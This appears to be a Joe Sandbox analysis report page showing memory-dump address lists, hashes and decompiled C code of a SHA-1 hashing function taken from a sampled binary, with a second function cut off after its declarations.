0x0101797d
0x01017983
0x01017989
0x0101798f
0x01017992
0x01017995
0x01017998
0x0101799b
0x0101799e
0x0101799e
0x0101799e
0x00000000
0x010179a3
0x0101792f
0x0101787f
0x01017882
0x01017882
0x01017884
0x00000000
0x00000000
0x01017886
0x01017887
0x0101788a
0x0101788d
0x00000000
0x00000000
0x00000000
0x0101788f
0x01017891
0x00000000
0x01017891
0x01017849
0x0101784c
0x01017856
0x0101785e
0x01017864
0x01017867
0x00000000
0x00000000
0x00000000
0x00000000
0x01017816
0x01017816
0x01017819
0x0101781b
0x0101781e
0x0101781e
0x0101781e
0x00000000
0x01017816
0x010176ec
0x010176ef
0x010176f3
0x010176f5
0x0101720b
0x0101720b
0x00000000
0x0101720b
0x010176fb
0x010176fe
0x01017703
0x01017705
0x0101770f
0x01017714
0x01017716
0x010177c6
0x010177c6
0x010177c9
0x010177cb
0x00000000
0x00000000
0x010177d1
0x010177d7
0x010177dd
0x010177e2
0x010177e6
0x010177ec
0x010177f5
0x010177f8
0x010177f8
0x010177f8
0x00000000
0x010177fd
0x0101771c
0x0101771e
0x00000000
0x00000000
0x01017724
0x0101772a
0x0101772c
0x01017732
0x01017736
0x01017739
0x0101773d
0x0101778f
0x01017792
0x00000000
0x00000000
0x0101779a
0x0101779a
0x0101779d
0x0101779f
0x010177a3
0x010177a8
0x010177ac
0x010177af
0x010177b2
0x010177b5
0x010177b8
0x010177bc
0x010177bc
0x010177bc
0x00000000
0x010177c1
0x0101773f
0x01017742
0x00000000
0x00000000
0x0101774a
0x0101774a
0x0101774d
0x01017750
0x01017753
0x01017758
0x0101775e
0x01017764
0x0101776a
0x01017770
0x01017776
0x01017779
0x0101777c
0x0101777f
0x01017782
0x01017785
0x01017785
0x01017785
0x00000000
0x0101778a
0x010176b3
0x010176b7
0x010176bc
0x010176be
0x00000000
0x00000000
0x010176c7
0x010176cc
0x010176ce
0x00000000
0x00000000
0x00000000
0x010176ce
0x01017295
0x0101729b
0x0101729e
0x010172af
0x010172b2
0x010172b2
0x010172a0
0x010172a0
0x010172a0
0x010172b4
0x010172b7
0x010172b9
0x010172e3
0x010172bb
0x010172bd
0x010172c4
0x010172cc
0x010172ce
0x010172d0
0x010172d8
0x010172de
0x010172de
0x010172e8
0x010172ef
0x010172f5
0x010172fb
0x01017302
0x01017330
0x01017331
0x01017332
0x01017334
0x01017350
0x01017353
0x0101735a
0x0101735d
0x01017360
0x0101736c
0x01017378
0x0101737a
0x01017380
0x01017382
0x01017382
0x01017384
0x00000000
0x01017384
0x0101733c
0x0101733f
0x0101733f
0x01017341
0x00000000
0x00000000
0x01017343
0x01017344
0x01017347
0x0101734a
0x00000000
0x00000000
0x00000000
0x0101734c
0x0101734e
0x00000000
0x01017304
0x01017306
0x01017309
0x01017313
0x0101731b
0x01017321
0x01017324
0x0101738c
0x0101738c
0x0101738f
0x01017392
0x010173a2
0x010173a5
0x010173a5
0x01017394
0x01017394
0x01017394
0x010173a7
0x010173ab
0x010173ae
0x010173b2
0x010173b4
0x010173b8
0x010173ba
0x010174eb
0x010174eb
0x010174f1
0x010174f3
0x010174f4
0x010174fa
0x010174fc
0x010174fd
0x01017503
0x01017505
0x01017505
0x01017505
0x01017503
0x010174fa
0x01017509
0x0101750f
0x01017515
0x01017518
0x0101751b
0x01017526
0x01017528
0x0101752d
0x01017530
0x01017534
0x01017536
0x01017667
0x01017667
0x0101766b
0x0101766e
0x01017670
0x00000000
0x00000000
0x01017676
0x0101767c
0x01017680
0x01017686
0x0101768b
0x0101768f
0x01017695
0x0101769e
0x010176a1
0x010176a1
0x010176a1
0x00000000
0x0101753c
0x0101753c
0x0101753e
0x00000000
0x00000000
0x01017544
0x0101754a
0x0101754d
0x01017553
0x01017557
0x0101755a
0x0101755e
0x010175a9
0x010175ac
0x00000000
0x00000000
0x010175b0
0x010175b0
0x010175b3
0x010175b7
0x010175b9
0x010175bd
0x010175c2
0x010175c6
0x010175c9
0x010175cc
0x010175cf
0x010175d2
0x010175d6
0x010175d6
0x010175d6
0x00000000
0x010175b9
0x01017560
0x01017563
0x00000000
0x00000000
0x01017567
0x01017567
0x0101756a
0x0101756d
0x01017570
0x01017575
0x0101757b
0x01017581
0x01017587
0x0101758d
0x01017593
0x01017596
0x01017599
0x0101759c
0x0101759f
0x010175a2
0x010175a2
0x010175a2
0x00000000
0x010175a7
0x010173c0
0x010173c0
0x010173c3
0x010174be
0x010174c7
0x010174d1
0x010174d5
0x010174de
0x010174e1
0x010174e1
0x010174e4
0x010174e7
0x010174e7
0x00000000
0x010174e7
0x010173c9
0x010173ff
0x010173cb
0x010173ce
0x010173d3
0x010173db
0x010173e3
0x010173e6
0x010173ee
0x010173f5
0x010173fa
0x010173fa
0x01017404
0x0101740b
0x01017411
0x01017417
0x0101741e
0x0101744c
0x0101744d
0x0101744e
0x01017452
0x01017454
0x01017472
0x01017475
0x01017481
0x01017484
0x01017488
0x0101748d
0x010174a0
0x010174a2
0x010174a8
0x010174aa
0x010174aa
0x010174ac
0x00000000
0x010174ac
0x0101745c
0x0101745f
0x0101745f
0x01017461
0x00000000
0x00000000
0x01017463
0x01017464
0x01017467
0x0101746a
0x00000000
0x00000000
0x00000000
0x0101746c
0x0101746e
0x00000000
0x01017420
0x01017422
0x01017425
0x0101742f
0x01017437
0x0101743d
0x01017440
0x010174b4
0x010174b7
0x00000000
0x010174b7
0x0101741e
0x010173ba
0x01017302
0x0101727b
0x0101727e
0x0101727e
0x0101727e
0x00000000
0x0101727e
0x0101721f
0x01017222
0x01017222
0x01017224
0x00000000
0x00000000
0x01017226
0x01017227
0x0101722a
0x0101722d
0x00000000
0x00000000
0x00000000
0x0101722f
0x01017231
0x00000000
0x01017231
0x010171e0
0x010171e3
0x010171ed
0x010171f5
0x010171fb
0x010171fe
0x01017201
0x00000000
0x01017201
0x0101718e
0x01017191
0x00000000
0x00000000
0x01017195
0x010171a0
0x010171a6
0x01017a2f
0x01017a2f
0x00000000
0x01017a2f
0x010171ac
0x00000000
0x00000000
0x010171b4
0x010171ba
0x00000000
0x00000000
0x00000000
0x010171ba
0x01017136
0x01017102
0x010170d3
0x010170d7
0x010170db
0x010170df
0x010170e7
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction ID: 1a622d2de0357026b799a54a1c3dbe7b391e5bc8ac415f753502e1dfeccafb4d
Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction Fuzzy Hash: 7D6203716047869FC719CF28C8805F9FBE1BF45204F18866DD9E68774AD738E956CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0100ED14, Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0100ED14(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v40;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E0101F4B0(_t839, _a12, 0x40);
					_t906 =  &(( &_v40)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_v24 = _t848[2];
				_v28 = _t848[3];
				_v36 = 0;
				_t429 = E01026064( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_v32 =  &(_t839[3]);
				do {
					_t431 = E01026064(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t431;
					_t436 = E01026064( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t436;
					asm("ror esi, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _v28 + _t436;
					_t441 = E01026064( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t441;
					asm("ror dword [esp+0x28], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _v28 ^ _t593) + _v24 + 0x5a827999 + _t441;
					_t443 = E01026064( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t443;
					_t446 = _v36 + 5;
					asm("ror dword [esp+0x30], 0x2");
					_v36 = _t446;
					_t593 = _t593 + ((_t851 ^ _v28) & _v24 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E01026064(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t448;
				} while (_v36 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t769 + _v28 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_v40 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _v24 + 0x5a827999;
				asm("ror esi, 0x2");
				_v32 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _v40 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _v40;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_v40 = _t887;
				_t888 = _v32;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_v36 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_v32 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_v40 ^ _v32 ^ _t891) + 0x6ed9eba1 + _v36 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _v36;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v36 = _t855;
					_t489 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v32 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _v36) + _v40 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _v40;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _v36) + _v32 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _v32;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_v32 = _t894;
					_v36 = _v36 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _v36 - 0x70e44324 + ((_v32 | _v28) & _t598 | _v32 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _v36;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v36 = _t842;
					_t811 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v28 | _t842) & _v32 | _v28 & _t842) + _t867 + _v40;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _v40 + 0x8f1bbcdc + ((_t897 | _v36) & _v28 | _t897 & _v36) + _t871 + _v32;
					_v24 = _t897;
					_t898 = _v20;
					_v32 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _v40;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _v36 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _v32;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_v32 = _t899;
					_t858 = _v4;
					_v36 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _v36;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_v40 ^ _v32 ^ _t902) + _t820 + _t845 + _v36 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _v36;
					asm("rol ecx, 0x5");
					_v40 = (_v32 ^ _v28 ^ _t882) + _t825 + _v40 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_v36 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_v32 = (_t604 ^ _v28 ^ _v36) + _t830 + _v32 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v28 = (_t845 ^ _v40 ^ _v36) + _t834 + _v28 + _v32 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _v32;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _v40;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_v32 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _v36;
					_v16 = _t816;
					_v36 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}

0x0100ed14
0x0100ed20
0x0100ed2c
0x0100ed36
0x0100ed3b
0x0100ed40
0x0100ed22
0x0100ed22
0x0100ed26
0x0100ed26
0x0100ed43
0x0100ed4c
0x0100ed4e
0x0100ed51
0x0100ed5b
0x0100ed61
0x0100ed65
0x0100ed7d
0x0100ed88
0x0100ed8a
0x0100ed8c
0x0100ed91
0x0100ed94
0x0100ed98
0x0100ed9c
0x0100ed9f
0x0100edaa
0x0100edaf
0x0100edc9
0x0100edce
0x0100edd9
0x0100ede6
0x0100edeb
0x0100edff
0x0100ee06
0x0100ee10
0x0100ee1d
0x0100ee26
0x0100ee36
0x0100ee42
0x0100ee44
0x0100ee4f
0x0100ee54
0x0100ee57
0x0100ee6b
0x0100ee72
0x0100ee79
0x0100ee82
0x0100ee86
0x0100ee8a
0x0100ee95
0x0100ee98
0x0100ee9b
0x0100eea7
0x0100eeb9
0x0100eebc
0x0100eebe
0x0100eed4
0x0100eedc
0x0100eee0
0x0100eeeb
0x0100eefd
0x0100ef04
0x0100ef07
0x0100ef0d
0x0100ef0f
0x0100ef14
0x0100ef19
0x0100ef2f
0x0100ef38
0x0100ef3a
0x0100ef3d
0x0100ef43
0x0100ef49
0x0100ef58
0x0100ef68
0x0100ef6a
0x0100ef70
0x0100ef72
0x0100ef78
0x0100ef7d
0x0100ef81
0x0100ef87
0x0100ef8b
0x0100ef95
0x0100ef9c
0x0100efa1
0x0100efa2
0x0100efa6
0x0100efaa
0x0100efae
0x0100efae
0x0100efae
0x0100efb3
0x0100efb7
0x0100efbf
0x0100efc5
0x0100efc8
0x0100efcb
0x0100efda
0x0100efe9
0x0100efeb
0x0100efee
0x0100eff4
0x0100effe
0x0100f003
0x0100f009
0x0100f00d
0x0100f011
0x0100f015
0x0100f019
0x0100f01e
0x0100f031
0x0100f040
0x0100f042
0x0100f045
0x0100f04b
0x0100f050
0x0100f063
0x0100f069
0x0100f06d
0x0100f07d
0x0100f086
0x0100f090
0x0100f093
0x0100f095
0x0100f09c
0x0100f0a2
0x0100f0b1
0x0100f0be
0x0100f0c4
0x0100f0cc
0x0100f0ed
0x0100f0f0
0x0100f0f7
0x0100f0fb
0x0100f0fe
0x0100f108
0x0100f118
0x0100f11d
0x0100f125
0x0100f13c
0x0100f143
0x0100f147
0x0100f149
0x0100f14c
0x0100f152
0x0100f15b
0x0100f16b
0x0100f170
0x0100f177
0x0100f17b
0x0100f17f
0x0100f18a
0x0100f18b
0x0100f195
0x0100f195
0x0100f195
0x0100f198
0x0100f19b
0x0100f1a2
0x0100f1a7
0x0100f1ac
0x0100f1b3
0x0100f1c1
0x0100f1d0
0x0100f1d2
0x0100f1d8
0x0100f1e7
0x0100f1ea
0x0100f1ed
0x0100f1ee
0x0100f1fa
0x0100f1fe
0x0100f208
0x0100f20a
0x0100f211
0x0100f221
0x0100f22a
0x0100f22c
0x0100f22f
0x0100f243
0x0100f24a
0x0100f24d
0x0100f257
0x0100f25d
0x0100f261
0x0100f271
0x0100f280
0x0100f283
0x0100f285
0x0100f288
0x0100f2ac
0x0100f2b5
0x0100f2b8
0x0100f2ba
0x0100f2be
0x0100f2c8
0x0100f2cf
0x0100f2e5
0x0100f2ef
0x0100f2f1
0x0100f2f5
0x0100f303
0x0100f312
0x0100f31a
0x0100f31f
0x0100f326
0x0100f33f
0x0100f345
0x0100f347
0x0100f34b
0x0100f351
0x0100f359
0x0100f35e
0x0100f36e
0x0100f374
0x0100f378
0x0100f382
0x00000000
0x00000000
0x0100f191
0x0100f191
0x0100f38a
0x0100f38b
0x0100f38f
0x0100f38f
0x0100f38f
0x0100f394
0x0100f398
0x0100f39d
0x0100f3a2
0x0100f3a7
0x0100f3a9
0x0100f3ab
0x0100f3af
0x0100f3be
0x0100f3cd
0x0100f3cf
0x0100f3d2
0x0100f3da
0x0100f3df
0x0100f3e8
0x0100f3ee
0x0100f3f2
0x0100f3f6
0x0100f3fd
0x0100f3ff
0x0100f412
0x0100f421
0x0100f423
0x0100f426
0x0100f42e
0x0100f441
0x0100f445
0x0100f449
0x0100f44c
0x0100f45c
0x0100f465
0x0100f46f
0x0100f472
0x0100f474
0x0100f47b
0x0100f47f
0x0100f494
0x0100f49d
0x0100f4a1
0x0100f4a5
0x0100f4ca
0x0100f4d3
0x0100f4d6
0x0100f4d8
0x0100f4db
0x0100f4e9
0x0100f4f6
0x0100f513
0x0100f516
0x0100f51a
0x0100f51c
0x0100f51f
0x0100f525
0x0100f52d
0x0100f536
0x0100f53a
0x0100f543
0x0100f547
0x0100f549
0x0100f550
0x0100f554
0x0100f55d
0x0100f561
0x0100f564
0x0100f567
0x0100f56a
0x0100f56c
0x0100f576

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
Instruction ID: ed1cf28e872a5d80a0ed4ec70b14e5cf1a71ef333a7e03d750e32dd996241b58
Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
Instruction Fuzzy Hash: 15523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 01016A7B, Relevance: .5, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E01016A7B(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
